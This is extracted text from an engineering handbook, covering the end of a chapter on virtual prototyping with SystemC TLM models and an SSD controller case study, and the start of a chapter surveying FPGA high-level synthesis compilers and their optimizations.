attributes of the original on-chip bus protocol. This enables the creation of fully
cycle accurate FT models, where the accuracy is not limited by the expressiveness
of the TLM protocol, even though certain details of the model-internal behavior
might be abstracted. Accordingly, fully cycle accurate transactors between TLM
models and pin-level RTL models can be created, which map the TLM FT protocol
phases to RTL pin events and vice-versa. This way, implementation accurate RTL
models can be used in the context of accurate TLM models.
TLM-2.0 Summary
The goal of the IEEE 1666 TLM-2.0 standard is to enable model interoperability at
the level of SoC building blocks, like processors, buses, memories, or peripherals.
For this purpose, TLM-2.0 standardizes the modeling interface for memory mapped
27 Virtual Prototyping of Processor-Based Platforms 973
Levels of Abstraction
Obviously, it would be preferable to have one single model that enables all VP
use-cases. Unfortunately, the vicious modeling triangle proclaims that any model
can only fulfill two of the three desirable attributes of being fast, accurate, and
economical to develop.
• LT models are fast and their development requires relatively low effort, but they
do not provide sufficient timing accuracy for architecture use-cases.
• RTL simulation or translation is accurate and cost-effective, but the simulation
speed is not sufficient to enable architecture exploration or SW development
related VP use-cases.
• Hand-written speed-optimized timing-accurate TLM models or RTL emulation
are both fast and accurate, but also rather expensive solutions.
974 T. Kogel
One escape route from this vicious triangle is to generate fast timing accurate
models from a higher level formalized specification, but developing such technology
requires high initial investment and is only applicable to a constrained class of
target IP (Hoffmann et al. 2001; ASIP Designer; Tensilica Customizable Processors;
Lecler and Baillieu 2011).
Commercial TLM libraries abandon the goal of providing a one-fits-all solution
and typically focus on the more widely deployed SW related use-cases (Arm Fast
Models; Synopsys DesignWare TLM library). Vendors of interconnect and memory
controller IP that is critical for the SoC performance focus on providing Approxi-
mate Timed models for architecture analysis (Lecler and Baillieu 2011; Synopsys
Platform Architect). Embedded processor vendors often provide two versions of
models for their IP, one for SW use-cases and one for architecture use-cases, e.g.,
Arm’s Fast Models (Arm Fast Models) and Cycle Models (Arm Cycle Models),
Synopsys Arc nSim and xCAM (DesignWare ARC nSIM), Tensilica TurboXim,
and cycle accurate ISS (Tensilica Customizable Processors). Open-source processor
modeling frameworks like gem5 provide multiple levels of abstraction for the
processor core and the memory sub-system to choose the most suitable speed-
accuracy trade-off for the respective modeling task (Binkert et al. 2011).
Processor Models
Programmable cores are obviously the key component of processor-based platforms,
and therefore the corresponding processor models play a critical role for the Virtual
Prototype. The technology used for the development of the processor models largely
determines the simulation speed and accuracy of the overall VP.
Please refer also to the Chap. 25, “Processor Simulation and Characterization” by
Martin et al. for a more detailed description of the different abstraction levels of
processor simulators.
• An Instruction Accurate ISS naturally fits with the Loosely Timed blocking
transport API and Direct Memory Interface. Also, the simulation loop of the
processor can be smoothly integrated with the temporal decoupling concept of
the LT API to achieve the highest possible simulation speed and still maintain
sufficient timing fidelity in the context of a multi-core VP (Engblom 2018).
• A Cycle-based ISS as well as RTL cores should be fitted with the non-blocking
transport interface of the Approximately Timed TLM-2.0 API, preferably an
extended version that enables the modeling of individual data phases. This way
the inherent accuracy of the processor model is preserved in the context of the
VP, such that the generated TLM traffic can be used for architecture use-cases
like performance analysis of caches, cache coherent interconnect, Network-on-
Chip and memory controllers, etc., all of which benefit from highly accurate
transactions sequences.
• Tracing, analysis, and scripting provide further added value for all VP use-cases.
The processor model needs to provide the necessary APIs to peek and poke
into local resources like registers, memories, performance counters, etc. Based
on these instrumentation APIs, Virtual Prototyping tools can visualize traces of
instructions, function calls, and register access as well as OS-aware tracing of
context switches.
• The storage and synchronization layer stores the data of write transactions and
returns the data in case of read transactions.
• The behavior models the algorithm or state machine of the component. The
behavior is triggered when certain memories or registers in the storage layer are
accessed.
27 Virtual Prototyping of Processor-Based Platforms 977
The different needs in timing accuracy can be addressed by separating the code
that models the timing of the component from the pure functional behavior. SCML
supports this separation by providing modeling objects for each of these layers.
The SCML modeling library greatly helps to reduce the modeling effort of
custom peripheral components. In the context of commercial Virtual Prototyping
projects, the effort for creating models can be further reduced by using model gen-
eration tools. For example, an SCML-based peripheral model can be automatically
generated from an IP-XACT description of the register interface.
The last section of this chapter illustrates the construction and usage of Virtual
Prototypes based on an SSD controller SoC case study. Especially in the area of
data center storage, this is a representative example of a demanding and competitive
application domain, both in terms of complex multi-core SoC architecture and
complex software stacks in the critical path of the system performance. The
following sub-sections give a brief introduction to SSD controllers and then describe
the refinement from a Loosely Timed Virtual Prototype for SW development to
timing accurate Virtual Prototype for performance analysis.
978 T. Kogel
Fig. 14 Typical SSD system with SoC block diagram (right), SSD firmware components (middle),
write and read operation (left)
27 Virtual Prototyping of Processor-Based Platforms 979
As shown on the bottom right side of Fig. 15, the first step is to build a fast
Loosely Timed Virtual Prototype, which enables the execution of the unmodified
SSD firmware stack. This example is based on an Arm CPU, so the CPU subsystem
is modeled using an Arm Fast Model of the Cortex R processor and the Generic
Interrupt Controller (GIC) (Arm Fast Models). The host interface is based on the
Synopsys PCIe controller, which is available in the TLM model library of Synopsys
Virtualizer, a Virtual Prototyping environment for software development use-cases
(Synopsys Virtualizer; Synopsys DesignWare TLM library). The same applies to
the Loosely Timed models of the generic NVMe controller, interconnect, memory,
DMA controller, and UART. The SSD firmware in this case-study is based on the
OpenSSD project, see Song et al. (2014) and The OpenSSD Project.
Only the Flash Controller is a custom IP block and therefore requires a dedicated
modeling effort. Following the modeling pattern based on the SCML modeling
library (The SystemC Modeling Library) as described in the last paragraph of
section “Building TLM Components for Virtual Prototypes”, the actual coding
is reduced to the functional behavior. The modeling effort is further reduced by
using the Virtualizer TLM Creator tool with its library of reusable TLM building
Fig. 15 Loosely Timed Virtual Prototype of SSD controller, connected to embedded software
debugger, platform debugger, and OS for end-to-end software testing
980 T. Kogel
blocks for basic components like FIFO buffers, state machines, and the ONFI
Flash protocol interface. Apart from the required functionality, the flash controller
model is annotated with configurable timing to take the latency of Flash operations
into account. Also, a variety of custom monitors are added to trace and analyze,
e.g., the IO operations per second, the flash commands and internal state, and the
accessed flash blocks. Enriching the flash controller model with timing annotation
and analysis instrumentation requires some additional modeling effort, but greatly
increases the usability for SW development and architecture analysis use-cases.
By itself, the Loosely Timed Virtual Prototype of the SSD controller can be used
to test the embedded firmware. The real value and practical usability come from the
integration of the SW-VP into an ecosystem of software development tools:
The PCIe Virtual IO connectivity enables the testing of the firmware on the SSD
device in the context of the host driver and host application. This way, the VP
of the SSD controller can be mounted, enumerated, formatted using standard
Linux commands, and accessed from applications like file browsers or benchmark
programs, just like a real NVMe device. This end-to-end testing of the SSD firmware
stack in the context of the host application and driver stack greatly increases the
embedded firmware quality.
Further important use-cases are scripting, regression, and continuous integration
to automate the testing of the SSD firmware, as well as coverage-driven fault
injection to further increase the SW quality beyond the expected application context.
The Loosely Timed (LT) platform of an SSD controller is optimized for high
simulation speed and bit-accurate behavior but does not model the detailed timing.
To enable performance analysis and optimization of the firmware and the SoC
architecture, the fast functional models of the processor, the interconnect, and
the DRAM memory controller are replaced with their accurate counterparts. The
remaining models are not in the critical path of the performance analysis and
stay at the LT level. The timing annotation of the LT flash controller model is
sufficiently accurate to model the delay of the Flash operations. To simplify the
directed performance testing, the PCIe and NVMe host interfaces are removed.
27 Virtual Prototyping of Processor-Based Platforms 981
Instead, the host commands are poked into the CPU memory space using simulation
scripts to directly trigger the respective FTL operation.
In this example, the instruction accurate ISS of the Arm CPU is replaced by
the corresponding Arm Cycle Model (Arm Cycle Models). Then the flat untimed
LT memory is exchanged with an accurate model of the Synopsys DesignWare
uMCLT2 DDR memory controller. The last step is to replace the simple LT bus
model with a cycle accurate model of Arm CoreLink NIC400. Both the uMCTL2
and NIC400 TLM performance models are available in the model library of
Synopsys Platform Architect, a Virtual Prototyping environment for architecture
use-cases (Synopsys Platform Architect). Based on this incremental refinement,
the Loosely Timed SW-VP is converted into a Virtual Prototype for architecture
analysis. The resulting architecture model of the SSD controller is shown on the left
side of Fig. 16.
The main value of running a timing accurate Virtual Prototype is provided by the
analysis results generated by the simulation. As an example, the charts in the middle
of Fig. 16 show from top to bottom the event statistics of the CPU Performance
Monitor Unit (PMU), the firmware function trace, the bus throughput, and the data
channel utilization of the DDR memory. Especially the PMU analysis provides great
insight into how efficiently the CPU subsystem executes the specific firmware, e.g.,
the performance of the branch predictor, the different reasons for CPU pipeline
stalls, or the hits and misses in the level one instruction and data caches.
This level of detail is essential for root cause analysis, to identify and fix the
reasons for performance issues, either in the firmware or the HW architecture.
However, looking at the results of one simulation at a time is not efficient for
analyzing design trade-offs. The latter is more effectively done using sensitivity
analysis with pivot charts as shown on the right side of Fig. 16. Here the aggregated
KPIs from a parameter sweep can be compared, highlighting the impact of design
and configuration parameters on various metrics.
The specific example shows the execution time for the boot sequence (blue bars)
and for processing 10 host commands (orange bars), depending on a variety of
settings for the CPU clock frequency, the DDR memory speed, and the depth of
the bus transaction pipeline. The pivot chart shows a saturation of the performance
at the lower as well as the higher end of the spectrum, and a clear performance
increase in the middle.
Fig. 16 Virtual Prototype for performance analysis of SSD controller (left), detailed analysis
results (middle), and sensitivity analysis (right)
982 T. Kogel
Similar analysis would be possible with the RTL model of the SSD controller,
but only at a much later point in time of the development process. The cycle accurate
TLM model provides much better visibility for HW and SW performance analysis
and faster turn-around time for parametric what-if analysis.
This section summarizes the benefits of Virtual Prototypes in the context of this SSD
controller case study.
The SW-VP is first used for the bring-up of the SSD firmware stack, in particular
the porting of the device drivers of the NAND flash controller and the PCIe host
interface. The PCIe Virtual I/O concept further expands the scope for firmware
development and testing on Virtual Prototypes. It enables the validation in the
context of real-world applications for PCIe end point devices, like SSD controllers,
Smart Network Interface Cards (SmartNIC), or AI accelerator cards. This expands
the range of available test scenarios, enabling host side and device side software
to be built, run, and tested in the target environment. Similar benefits apply for the
virtual and real-world connectivity of other interface IP, like USB or Ethernet.
Refining the Loosely Timed SW-VP into timing accurate VP enables the joint
hardware and software performance analysis and optimization. Especially the
analysis of performance counters in cycle accurate processor models provides
insight into cache performance and micro-architecture effects like branch prediction
and pipeline stalls. The accurate traffic can be used for interconnect and memory
performance optimization.
The best return of investment comes from taking advantage of both software
and architecture use-cases. Part of the TLM models can be re-used between the
loosely timed and timing accurate Virtual Prototype to reduce the modeling effort.
Having the firmware running on the SW-VP as a known good starting point greatly
increases the productivity for the creation and bring-up of the more accurate and
slower performance analysis platform.
This chapter reviews the state of the art in Virtual Prototyping, with a focus on
use-cases around early architecture analysis and software development, including
an introduction to the underlying SystemC based TLM modeling paradigm.
The use of Virtual Prototypes for architecture analysis during the specification
phase is growing continuously, as it becomes increasingly difficult to predict the
non-functional properties like power and performance of heterogeneous many-
processor SoCs. Here, Virtual Prototypes help to reduce the risk of under-designing
and over-designing, especially as chip design projects increasingly require deep
collaboration of different teams and even across multiple companies.
27 Virtual Prototyping of Processor-Based Platforms 983
Trademarks
Synopsys, Virtualizer, Platform Architect, and DesignWare are registered trade-
marks of Synopsys, Inc.
984 T. Kogel
Arm, Cortex, and AMBA are registered trademarks of Arm Limited. “Arm” is
used to represent Arm Holdings plc.; its operating company Arm Limited; and its
regional subsidiaries.
All other brands or product names are the property of their respective holders.
Disclaimer
The opinions and observations expressed in this publication are my own. They do
not purport to reflect the opinions, views, or intentions of my employer Synopsys,
Inc.
References
Android Studio. https://developer.android.com/studio
Arm Cycle Model Studio. https://www.arm.com/products/development-tools/simulation/cycle-
model-studio
Arm Cycle Models. https://developer.arm.com/tools-and-software/simulation-models/cycle-
models
Arm Development Studio. https://www.arm.com/products/development-tools
Arm Fast Models. https://developer.arm.com/tools-and-software/simulation-models/fast-models
Arm Fixed Virtual Platforms. https://developer.arm.com/tools-and-software/simulation-models/
fixed-virtual-platforms
ASIP Designer. https://www.synopsys.com/designware-ip/processor-solutions/asips-tools.html
CEVA. https://www.ceva-dsp.com
DesignWare ARC nSIM. https://www.synopsys.com/dw/ipdir.php
Functional Mock-up Interface (FMI). https://fmi-standard.org
Intel CoFluent. https://www.intel.com/content/www/us/en/cofluent/overview.html
Intel Integrated Simulation Infrastructure with Modeling (ISIM). https://software.intel.com/
content/www/us/en/develop/tools/integrated-simulation-infrastructure.html
Jenkins Automation Server for Continuous IntegrationContinuous Delivery. https://www.
jenkins.io/
Lauterbach Development Tools. https://www.lauterbach.com
Mirabilis VisualSim. https://www.mirabilisdesign.com
Oracle Virtual Box. https://www.virtualbox.org
Silver Virtual ECU. https://www.synopsys.com/verification/virtual-prototyping/virtual-ecu/silver.
html
Simulink. https://www.mathworks.com/products/simulink.html
Synopsys DesignWare TLM library. https://www.synopsys.com/verification/virtual-prototyping/
virtual-prototyping-models/designware-tlm-library.html
Synopsys Platform Architect. https://www.synopsys.com/verification/virtual-prototyping/
platform-architect.html
Synopsys Virtualizer. https://www.synopsys.com/verification/virtual-prototyping/virtualizer.html
Tensilica Customizable Processors. https://ip.cadence.com/ipportfolio/tensilica-ip
The Modelica Association. https://modelica.org
The OpenSSD Project. http://www.openssd.io
The Software Freedom Conservancy. QEMU the fast processor emulator. https://www.qemu.org
The SystemC Modeling Library (SCML). http://www.synopsys.com/cgi-bin/slcw/kits/reg.cgi
Tool CommLanguage (TCL). http://www.tcl.tk
Verilator. https://www.veripool.org/verilator
IEEE Standard for Standard SystemC Language Reference Manual (2012) IEEE Std 1666-2011
(Revision of IEEE Std 1666-2005), pp 1–638
27 Virtual Prototyping of Processor-Based Platforms 985
Guerra L, Fitzner J, Talukdar D, Schlager C, Tabbara B, Zivojnovic V (1999) Cycle and phase
accurate DSP modeling and integration for HW/SW co-verification. In: Proceedings 1999
design automation conference (Cat. No. 99CH36361), pp 964–969
Gupta RK, De Micheli G (1993) Hardware-software cosynthesis for digital systems. IEEE Des
Test 10(3):29–41
Hellestrand G (1999) The revolution in systems engineering. IEEE Spectr 36(9):43–51
Hoffmann A, Kogel T, Nohl A, Braun G, Schliebusch O, Wahlen O, Wieferink A, Meyr H (2001)
A novel methodology for the design of application-specific instruction-set processors (ASIPS)
using a machine description language. IEEE Trans Comput-Aided Des Integr Circuits Syst
20(11):1338–1354
Huang G, Hu J, He Y, Liu J, Ma M, Shen Z, Wu J, Xu Y, Zhang H, Zhong K, Ning X, Ma Y, Yang
H, Yu B, Yang H, Wang Y (2021) Machine learning for electronic design automation: a survey
Jünger L, Zurstraßen N, Kogel T, Keding H, Leupers R (2020) Amaix: a generic analytical model
for deep learning accelerators. In: Orailoglu A, Jung M, Reichenbach M (eds) Embedded
computer systems: architectures, modeling, and simulation. Springer International Publishing,
Cham, pp 36–51
Kang K, Park S, Bae B, Choi J, Lee S, Lee B, Lee JB (2019) Seamless SoC verification using
virtual platforms: an industrial case study. In: Design, automation test in Europe conference
exhibition (DATE), pp 1204–1205
Kempf T, Dörper M, Leupers R, Ascheid G, Meyr H, Kogel T, Vanthournout B (2005) A
modular simulation framework for spatial and temporal task mapping onto multi-processor soc
platforms. In: Proceedings of the conference on design, automation & test in Europe (DATE),
Munich
Keutzer K, Newton A, Rabaey J, Sangiovanni-Vincentelli A (2000) System-level design: orthog-
onalization of concerns and platform-based design. IEEE Trans Comput-Aided Des Integr
Circuits Syst 19(12):1523–1543
Kienhuis B, Deprettere E, Vissers K, Van Der Wolf P (1997) An approach for quantitative analysis
of application-specific dataflow architectures. In: Proceedings IEEE international conference
on application-specific systems, architectures and processors, pp 338–349
Kogel T (2006) Peripheral modeling for platform driven ESL design. In: Burton M, Morawiec A
(eds) Platform based design at the electronic system level. Springer, New York, pp 71–85
Kogel T (2017) Synopsys virtual prototyping for software development and early architecture
analysis. In: Ha S, Teich J (eds) Handbook of hardware/software codesign. Springer, Dordrecht,
pp 1127–1159
Krishnan S, Wan Z, Bharadwaj K, Whatmough P, Faust A, Neuman S, Wei GY, Brooks D, Reddi VJ
(2021) Autopilot: automating SoC design space exploration for swap constrained autonomous
UAVs
Lapedus M (2018) Big trouble at 3 nm. https://semiengineering.com/big-trouble-at-3nm
Lecler JJ, Baillieu G (2011) Application driven network-on-chip architecture exploration &
refinement for a complex SoC. Des Autom Embed Syst 15(2):133–158
Liao S, Tjiang S, Gupta R (1997) An efficient implementation of reactivity for modeling hardware
in the scenic design environment. In: Proceedings of the 34th design automation conference,
pp 70–75
Liebel G, Marko N, Tichy M, Leitner A, Hansson J (2018) Model-based engineering in the
embedded systems domain: an industrial survey on the state-of-practice. Softw Syst Model
17(1):91–113
Martin G (1998) Design methodologies for system level IP. In: Proceedings of the conference on
design, automation and test in Europe. IEEE Computer Society, pp 286–289
Mäenpää M (2020) Virtualized CPU usage in SoC verification. Master’s thesis, University of Oulu,
Faculty of Information Technology and Electrical Engineering. http://urn.fi/URN:NBN:fi:oulu-
202008282897
Micheloni R, Marelli A, Eshghi K (2018) Inside solid state drives (SSDs). Springer
series in advanced microelectronics. Springer, Singapore. https://books.google.de/books?id=
UtNjDwAAQBAJ
27 Virtual Prototyping of Processor-Based Platforms 987
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 990
Existing HLS Compilers and Programming Models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 992
C-Based HLS Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 993
Dataflow Compilers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 994
Domain-Specific Languages (DSLs) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 995
Emerging Accelerator Design Languages . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 996
Key Compiler and Synthesis Optimizations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 997
Pipelining Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 998
Parallelization Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1004
Memory Customization Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1007
Data Type Customization Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1011
Case Study: Binarized Convolutional Neural Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1013
Algorithm Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1013
Pipelining and Unrolling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1014
Line Buffers and Window Buffers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1016
Data Vectorization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1016
Equal contribution from the first two authors; part of their work was done at Cornell.
N. Srivastava
Google LLC, Mountain View, CA, USA
G. Liu
Xilinx, Inc., San Jose, CA, USA
e-mail: [email protected]
Y.-H. Lai · Z. Zhang ()
Cornell University, Ithaca, NY, USA
e-mail: [email protected]; [email protected]
Abstract
Keywords
Introduction
Over the past two decades, field-programmable gate arrays (FPGAs) have evolved
from small chips with a few thousand logic blocks to billion-transistor systems-on-
chip that offer an attractive option for flexible and efficient accelerated computing.
In contrast to general-purpose processors (CPUs) and graphics processing units
(GPUs), FPGAs can be reconfigured to implement a highly specialized accelerator
architecture that is specifically optimized based on the key characteristics of a target
application. More specifically, the compute pipeline, memory hierarchy, and the
numerical representation of an FPGA accelerator are all customizable (Choi et al.
2016). For many applications, having such architectural flexibility can overcome the
limitation of a slower clock on an FPGA device, leading to both higher performance
and improved energy efficiency.
However, software programmability is a major hurdle for the wide deploy-
ment of FPGA-based acceleration (Bacon et al. 2013). Traditionally, FPGAs are
programmed using register-transfer level (RTL) languages where the designer is
28 FPGA-Specific Compilers 991
In this section, the authors describe and categorize the existing HLS tools and
compilers targeting FPGAs. There is a broad spectrum of programming models and
compilers for FPGAs, such as C-based HLS, dataflow compilers, domain-specific
languages, and emerging accelerator design languages. Due to the space limitation,
the authors can only survey a (small) subset of the representative and more recent
efforts.
While modern HLS tools may differ significantly in their input specifications,
they usually follow a similar design flow, which the authors sketch in Fig. 1. Starting
from a software program, the designer manually partitions it into a software part
running on the host CPU, and a set of compute-intensive kernels that are offloaded
to the FPGA. Some of the hardware/software partitioning tasks can also be done
automatically (King and Dave 2012) . The designer further provides the tool with
pragmas and directives to instruct the tool to generate the desired datapath and
memory components. As described in the Chap. 24, “Accelerator Design with
High-Level Synthesis”, the HLS tool first compiles the source level program into an
intermediate representation (IR), typically using an off-the-shelf software compiler
front-end. The IR is then iteratively transformed and optimized using native and
FPGA-specific passes. After that, compute kernels and tasks are extracted by the
tool to expose the data-level and task-level parallelism. Each of the kernels and tasks
is optimized through scheduling, pipelining, and other optimizations to extract loop-
level and operator-level parallelism. In addition, customized memory hierarchies are
generated to provide sufficient memory bandwidth to the compute kernels. Finally,
an RTL design is generated and synthesized into an FPGA bitstream.
28 FPGA-Specific Compilers 993
Software program
SW/HW partition
Pragma/directives
Host program
Intermediate
IR-level optimizations
representation
Compute
Extract loop level/operator kernels/tasks Memory
level parallelism customization
Optimized memory
FSM and datapath
hierarchy
RTL
QoR (area/timing/throughput)
Bitstream
The contemporary HLS compilers are commonly based on C/C++ and its extensions
(e.g., OpenCL, SystemC). These tools accept sequential C-like code as input with
optional user directives, and generate optimized hardware implementations on the
FPGA by exploiting various parallelization and customization opportunities either
automatically or guided by user directives. The representative C-based commercial
HLS tools include Xilinx Vivado/Vitis HLS, Xilinx Vitis Unified Software Platform,
Intel FPGA SDK for OpenCL, and Intel HLS Compiler. The HLS compilers based
on C/C++ have the advantage of allowing programmers to express algorithms
in an imperative way using the familiar C semantics, while leaving the work of
extracting parallelism and memory specialization to the compiler. Tools such as the
Xilinx OpenCL Compilerand Intel FPGA SDK for OpenCLcan generate optimized
hardware implementations exploiting the parallelism explicitly expressed in the
OpenCL language. Such tools are especially suitable for applications with a high
degree of regular data-level parallelism. Mentor Catapultand Cadence StratusHLS
tools mainly focus on ASIC designs, although they can also target a number of
popular FPGA devices. LegUp (Canis et al. 2011), Bambu (Pilato and Ferrandi
994 N. Srivastava et al.
2013), ROCCC (Najjar et al. 2016), GAUT (Coussy et al. 2008), and Kiwi Compiler
(KiwiC) (Singh and Greaves 2008) are among the well-known open-source HLS
tools developed by academic groups.
One of the key challenges of C-based HLS tools is for a user to write “hardware-
friendly” code in a way that efficient parallel/pipelined architecture can be inferred
from a sequential program. A newer generation of tools try to automate this
process to ease the burden of the programmers. For example, the Merlin Compiler
(2020) from Falcon Computing (recently acquired by Xilinx) takes OpenMP-
style C programming model and automatically generates the HLS C/OpenCL
code with optimized off-chip data movement, on-chip data reuse and memory
partitioning, and parallel-pipelined loops. Silexica (also acquired by Xilinx) pro-
vides the SLX-FPGA Tool Suiteto help convert non-synthesizable C/C++ code
to synthesizable HLS C code for Xilinx Zynq SoC and MPSoC devices. Delft
Workbench (DWB) (Nane et al. 2014) is a toolchain that uses Quipu (Meeuws et al.
2011) and Quad (Ostadzadeh et al. 2010) to predict the hardware usage and memory
accesses of a high-level application written in C and maps the compute-intensive
functions onto FPGAs.
Dataflow Compilers
DSLs provide more specialized language constructs and the associated compila-
tion flow that target a specific domain. This raises the level of abstraction for
the programmers and potentially simplifies the work of compilers in identifying
and exploiting opportunities for advanced domain-specific optimizations. Poly-
Mage (Mullapudi et al. 2015) includes a Python-embedded image processing
DSL and a polyhedral compilation framework composed of an optimizer and
an autotuner. It can automatically generate high-performance image processing
pipelines executed on the reconfigurable hardware. Halide (Ragan-Kelley et al.
2013) is a DSL specifically designed for high-performance image processing for
CPUs/GPUs. Halide-HLS (Pu et al. 2017), HeteroHalide (Li et al. 2020), and
GENESIS (Ishikawa et al. 2019) build on Halide to generate optimized image
processing pipelines for FPGAs. In addition to major works exploiting the Halide
compiler within their toolchain, there are a number of projects such as Liao et al.
(2019) and Carlson and Van Wyk (2019) that follow the same workflow but with
either extended versions of the Halide compiler or Halide-inspired DSL compilers
to support their own domain-specific structures. Darkroom (Hegarty et al. 2014) and
Rigel (Hegarty et al. 2016) can capture image processing algorithms as DAGs of
basic image processing operations and generate efficient hardware accelerators for
FPGA. Heterogeneous image processing acceleration (Hipacc) (Reiche et al. 2017)
is another DSL that is able to produce low-level code for image processing kernels
on FPGAs. The Rathlin image processing language (RIPL) (Stewart et al. 2018) is
a DSL for developing memory-efficient image processing applications.
OptiML (Sujeeth et al. 2011), a Scala-embedded machine learning DSL imple-
mented using the Delite compiler framework (Lee et al. 2011), is an automated
design tool for realizing FPGA accelerators from high-level programs. Tensor-
Flow (Abadi et al. 2016), MXNet (Chen et al. 2015), Caffe (Jia et al. 2014),
and PyTorch (Paszke et al. 2019) are some of the common DSLs designed
specifically for deep learning. Caffeine (Zhang et al. 2018a), based on Caffe, is
a hardware/software co-design framework to efficiently accelerate the entire CNN
on FPGAs. Spatial Multiverse (Hadjis and Olukotun 2019) converts a TensorFlow
trained model to Spatial (Koeplinger et al. 2018) hardware IR and generates
996 N. Srivastava et al.
While DSLs offer many advantages in productivity and compilation for individual
application domains, more general-purpose language models are still needed to (1)
bridge the gaps between popular domains, (2) provide programmers with greater
control on important optimizations, (3) and serve as a compilation target for
multiple high-level DSLs. Hence there is an increasingly popular trend to raise
the level of abstraction for HLS designs, while still being able to target various
application domains. Emerging accelerator design languages are specialized to
abstract away the implementation-level details of a C-based HLS design, while
allowing the designer to focus on higher-level design and optimization decisions.
Spatial (Koeplinger et al. 2018) is a Scala-based language and compiler to define
hardware accelerators. It is built using the Delite hardware definition language
(DHDL) (Koeplinger et al. 2016). Hot & Spicy (Skalicky et al. 2018) is an open-
source framework and toolchain for exploiting FPGA accelerators in applications
developed completely in Python. HeteroCL (Lai et al. 2019) is composed of a
Python-based DSL and an automated compilation flow that maps the input algorithm
into special-purpose accelerators through HLS. Similar to Halide (Ragan-Kelley
et al. 2013) and TVM (Chen et al. 2018), HeteroCL separates an algorithm spec-
ification from a temporal compute schedule. It further decouples the algorithm from
memory architectures and data quantization schemes, which are both essential for
efficient hardware customization. With respect to memory customization, HeteroCL
provides primitives to create custom memory hierarchy through banking, reuse
buffers, and data streaming. Dahlia (Nigam et al. 2020) is a new HLS language
that uses a type system to restrict the design space to HLS programs that can be
predictably compiled to hardware accelerators.
28 FPGA-Specific Compilers 997
While the existing HLS tools introduced in section “Existing HLS Compilers and
Programming Models” may differ significantly in their input specifications and
targeted application domains, they often employ a common set of optimizations
to achieve the design’s performance target. This section summarizes such key
optimizations that are ubiquitous in the existing tools and analyzes how each of
them affects the overall design throughput.
There are three major factors that impact the throughput of an HLS-based design,
which the authors summarize into the following formula:
On-chip network
HBM/DDR
Host
…
Compute unit Compute unit Compute unit
one of the many parallelizable tasks in the design. Such parallel compute units
help increase the hardware parallelism. Within each compute unit, there are
pipelined compute datapaths and the corresponding control logic. The pipeline can
be implemented as coarse-grained task-level pipelines and/or fine-grained loop-
level pipelines. These pipelines improve the utilization of the underlying hardware
resources. Finally, an application-specific memory hierarchy needs to be built
to supply the compute units with enough on-chip and off-chip bandwidth. This
includes data reuse to reduce off-chip memory accesses as well as on-chip buffering
and partitioning to increase on-chip memory bandwidth. Such a customized memory
hierarchy works with the parallelization and pipelining techniques to maximize the
throughput of the design.
Modern HLS tools commonly provide a set of compiler transformations and
synthesis optimizations to realize such an architectural template. In the following,
the authors use this parallel-pipelined architectural template with customized
memory hierarchy to drive the discussion of the rest of this chapter.
Pipelining Techniques
Operator-Level Optimizations
On general-purpose processors, the operations in the source program are compiled
into a fixed set of instructions, where each instruction takes at least one clock cycle.
In contrast, FPGA HLS tools can flexibly map the operations onto the heterogeneous
resources in a more flexible way to improve the resource utilization and/or increase
the clock frequency. Depending on the complexity of the operations being mapped,
the HLS tool can either pipeline them to improve timing, or schedule multiple
dependent operations into a single cycle to reduce latency. Figure 3 illustrates two
important operator-level optimizations, which the authors discuss in more detail as
follows.
Operator chaining schedules multiple dependent operations into one clock
cycle as long as the estimated delay of the resulting combinational logic does not
exceed the target cycle time. The delay estimation usually also takes into account the
underlying LUT primitives on an FPGA, so that the operations that are efficiently
implementable on an FPGA (e.g., bitwise operations) can be aggressively chained
28 FPGA-Specific Compilers 999
Look-up table
0/1
0/1
shift and >= 0 0/1 LUT
0/1
into a single cycle to improve the performance. Operation chaining improves the
utilization of the FPGA hardware resources by enabling the execution of multiple
operations on a small number of hardware resources. A recent technique considers
the underlying LUT mapping optimization during operator chaining to aggressively
group operations that can be combined into a single level of LUTs (Tan et al. 2015;
1000 N. Srivastava et al.
